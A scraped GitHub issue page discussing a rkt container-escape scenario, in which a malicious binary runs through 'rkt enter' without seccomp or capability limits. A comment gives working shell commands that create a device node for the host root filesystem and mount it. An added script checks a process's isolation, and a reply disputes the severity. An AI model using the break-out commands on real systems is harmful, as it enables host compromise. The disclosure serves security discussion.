Comments (2)
Consider the following scenario:
- An attacker who compromised a rkt pod wishes to compromise the host.
- The attacker substitutes `/bin/bash` inside the container with a malicious binary.
- A rkt user runs `rkt enter ${pod-id} bash`.
- The malicious binary is executed inside the container, but without several necessary isolation features (seccomp, cgroups, all capabilities). Thus the malicious binary can break out of the container and the attacker can run arbitrary code on the host as root.
To break out of the container, the malicious binary can run the following commands:
```bash
# Major/minor numbers of the device backing the pod's root filesystem (the
# host filesystem rkt unpacked the rootfs on), decoded from stat's dev_t
dev=$(stat -c '%d' /)
major=$(( (dev >> 8) & 0xfff )); minor=$(( (dev & 0xff) | ((dev >> 12) & 0xfff00) ))
# With seccomp and capability restrictions absent, create a node for it and mount it
mknod --mode 0600 /dev/host_root_fs_device b "$major" "$minor"
mkdir /host_root
mount /dev/host_root_fs_device /host_root
```
See this POC video. For more details see this post.
from rkt.
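The comment above turns on one observable fact: a process started by `rkt enter` has no seccomp filter and a full capability set, while the pod's own app does not. The following script is an added example, not code from the rkt issue or the rkt project: it reads the `Seccomp` and `CapEff` fields of a `/proc/<pid>/status` file and classifies the process as isolated or unrestricted. A malicious binary would run the same test before attempting the break-out, and an administrator can run it from inside an entered session to confirm what restrictions the session actually has. The status files used below are constructed samples; the function name `isolation_state` and the file layout under `$tmp` are this example's own.

```bash
#!/bin/sh
# Added example (not from the rkt issue): classify a process from its
# /proc/<pid>/status as "isolated" (seccomp filter or reduced capabilities)
# or "unrestricted" (Seccomp 0 and every capability the kernel knows).

# status_field FILE NAME -> first token after "NAME:" in a status file
status_field() {
    awk -v key="$2:" '$1 == key { print $2; exit }' "$1"
}

# isolation_state STATUSFILE LASTCAP
# LASTCAP is the value of /proc/sys/kernel/cap_last_cap, passed in so the
# function also works on captured files. Prints "isolated" or "unrestricted".
isolation_state() {
    seccomp=$(status_field "$1" Seccomp)          # 0 disabled, 1 strict, 2 filter
    capeff=$(( 0x$(status_field "$1" CapEff) ))   # effective capability mask
    full=$(( (1 << ($2 + 1)) - 1 ))               # mask with every capability set
    if [ "$seccomp" = 0 ] && [ "$capeff" -eq "$full" ]; then
        echo unrestricted
    else
        echo isolated
    fi
}

# Constructed samples (kernel with cap_last_cap = 37):
#  entered   : a shell started via rkt enter, no filter, all capabilities
#  app       : the pod's app, seccomp filter mode, container capability set
#  caps_only : root without a filter but with a reduced capability set
tmp=$(mktemp -d)
printf 'Name:\tbash\nCapEff:\t0000003fffffffff\nSeccomp:\t0\n'  > "$tmp/entered"
printf 'Name:\tnginx\nCapEff:\t00000000a80425fb\nSeccomp:\t2\n' > "$tmp/app"
printf 'Name:\tsh\nCapEff:\t00000000a80425fb\nSeccomp:\t0\n'    > "$tmp/caps_only"

isolation_state "$tmp/entered" 37     # unrestricted
isolation_state "$tmp/app" 37         # isolated
isolation_state "$tmp/caps_only" 37   # isolated
```

On a live system the same check is `isolation_state /proc/self/status "$(cat /proc/sys/kernel/cap_last_cap)"`; note that it deliberately reports "isolated" as soon as either restriction is present, because the break-out described above needs both the missing filter and the device-creation and mount capabilities.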
I do not understand how this is a vulnerability. `rkt enter` is an interactive root-only command (requires `sudo` or root access). IMHO an interactive root session started by an admin (e.g. to enter a container for inspection, etc.) should not be restricted.
Related Issues (20)
- update vendored "github.com/cznic/..."
- rkt-1.30.0 with lkvm stage1: builtin-run.c:412:28: error: '%s' directive output may be truncated writing up to 4095 bytes into a region of size 4091 [-Werror=format-truncation=] HOT 1
- Self-built stage1 host image using wrong systemd path HOT 1
- [Question] Common procedures for dealing with crashes from docker containers in rkt HOT 2
- rkt container not running on raspberrypi 3
- Expired key for deb.asc files HOT 5
- tests: TestFetchNoStoreCacheControl fails on SemaphoreCI HOT 1
- rkt can be tricked into executing helper binaries inside pods
- make unit-check fails HOT 1
- FYI: Archiving Rkt in CNCF HOT 2
- gc: Add --quiet flag
- Unable to fetch ubuntu 16.04 image
- Suggestion: Continuous Fuzzing
- rkt downloads and extracts every docker image layer
- rkt have some Problems with SELinux in Enforce Mode
- Can't specify tags in urls on official docker images HOT 1
- broken by Golang 1.13: extracttar error HOT 1
- rkt run docker's image mysql, error
- Ending and archiving the rkt project HOT 5